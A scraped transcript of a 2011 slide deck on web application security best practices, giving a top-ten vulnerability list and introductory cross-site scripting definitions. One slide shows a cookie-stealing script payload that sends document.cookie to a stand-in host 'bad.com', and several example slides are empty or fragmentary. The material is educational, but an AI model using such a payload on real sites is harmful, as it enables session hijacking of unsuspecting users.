Presentation is loading. Please wait.

Presentation is loading. Please wait.

WEB APPLICATION SECURITY BEST PRACTICES OF 2011 Copyright 2011 © CYBER GATES Permission is granted to copy, distribute and/or modify this document under.

Similar presentations


Presentation on theme: "WEB APPLICATION SECURITY BEST PRACTICES OF 2011 Copyright 2011 © CYBER GATES Permission is granted to copy, distribute and/or modify this document under."— Presentation transcript:

1 WEB APPLICATION SECURITY BEST PRACTICES OF 2011 Copyright 2011 © CYBER GATES Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License

2 OVERVIEW Web Application Security is a vast topic and time is not enough to cover all kind of malicious attacks and techniques for avoiding them, so now we will focus on top 10 high level vulnerabilities. Web developers work in different ways using their custom libraries and intruder prevention systems and now we will see what they should do and should not do based on best practices.

3 CONTENT 1. Overview 2. Statistics 2.1. Statistics of vulnerabilities 2.2. Statistics of risk levels 3. Top 10 high level vulnerabilities 3.1. Cross-Site Scripting 3.2. Information Leakage 3.3. SQL Injection 3.4. Cross-Site Request Forgery 3.5. ClickJacking 3.6. Local/Remote File Inclusion

4 3.7. Unrestricted File Uploads 3.8. Phishing 3.9. Session Hijacking Shell Injection 4. Cross-Site Scripting 4.1. Defination 4.2. Types Non-persistent Persistent 4.3. Non-persistent 4.4. Persistent 4.5. Common targets 4.6. Potentially Dangerous HTML elements

5 4.7. Best Solution 5. Information Leakage 5.1. Defination 5.2. Common reasons Directory listing misconfiguration Unproper error handling Unproper filetype handling Sensetive HTML comments 5.3. Directory listing misconfiguration 5.4. Unproper error handling 5.5. Unproper filetype handling 5.6. Sensetive HTML comments

6 5.7. Best Solution 6. SQL Injection 6.1. Defination 6.2. Types Normal SQL Injection Blind SQL Injection 6.3. Normal SQL Injection 6.4. Blind SQL Injection 6.5. Solutions 6.6. Best Solution 7. Cross-Site Request Forgery 7.1. Defination 7.2. Useless defenses

7 7.3. Solutions 7.4. Best Solution 8. ClickJacking 8.1. Defination 8.2. FrameKillers 8.3. FrameKiller killers 8.4. Best Solution 9. Local/Remote File Inclusion 9.1. Defination 9.2. Types Local File Inclusion Remote File Inclusion 9.3. Local File Inclusion

8 9.4. Remote File Inclusion 9.5. Common exploits/requests 9.6. Common methods of attack 9.7. Potentially dangerous PHP functons 9.8. Best Solution 10. Unrestricted File Uploads Defination Common mistakes Best Solution 11. Phishing Defination Best Solution 12. Session Hijacking

9 12.1. Defination Best Solution 13. Shell Injection Defination Potentially dangerous PHP functions Best Solution 14. Special thanks 15. Contact information 16. References

10 STATISTICS OF VULNERABILITIES Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html

11 STATISTICS OF RISK LEVELS Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html

12 TOP 10 HIGH LEVEL VULNERABILITIES 01. Cross-Site Scripting (XSS) [2005] 02. Information leakage 03. SQL Injection [~2005] 04. Cross-Site Request Forgery (CSRF) [1990s] 05. ClickJacking [J.Grossman and R.Hansen ] 06. Local/Remote File Inclusion 07. Unrestricted File Upload 08. Phishing [1987, 1996] 09. Session Hijacking [early 2000s] 10. Shell injection

13 CROSS-SITE SCRIPTING DESCRIPTION: Cross-Site Scripting is a type of web application vulnerability when attacker injects his executable code (Javascript, HTML, etc.) into a vulnerable webpage. EXAMPLE: alert( “XSS”)

14 CROSS-SITE SCRIPTING TYPES: 1.Non-Persistent 2.Persistent 1.Non-Persistent: In this type of XSS vulnerability an attacker is able to execute his own code into a webpage but no changes can be done in that website.

15 CROSS-SITE SCRIPTING Non-Persistent EXAMPLE: document.location="http://bad.com /logger.php?cookie="+document.cookie; OR document.write(“ ”);

16 CROSS-SITE SCRIPTING 2.Persistent: In this case attacker stores his executable script in the vulnerable website database which is being executed every time webpage is showing the data. Common targets are: Comments Chat messages messages Wall posts, etc.

17 CROSS-SITE SCRIPTING Persistent EXAMPLE:

18 CROSS-SITE SCRIPTING Persistent Comment in raw format: and I like the way this website developers work..hahaha :D :D

Ads by Google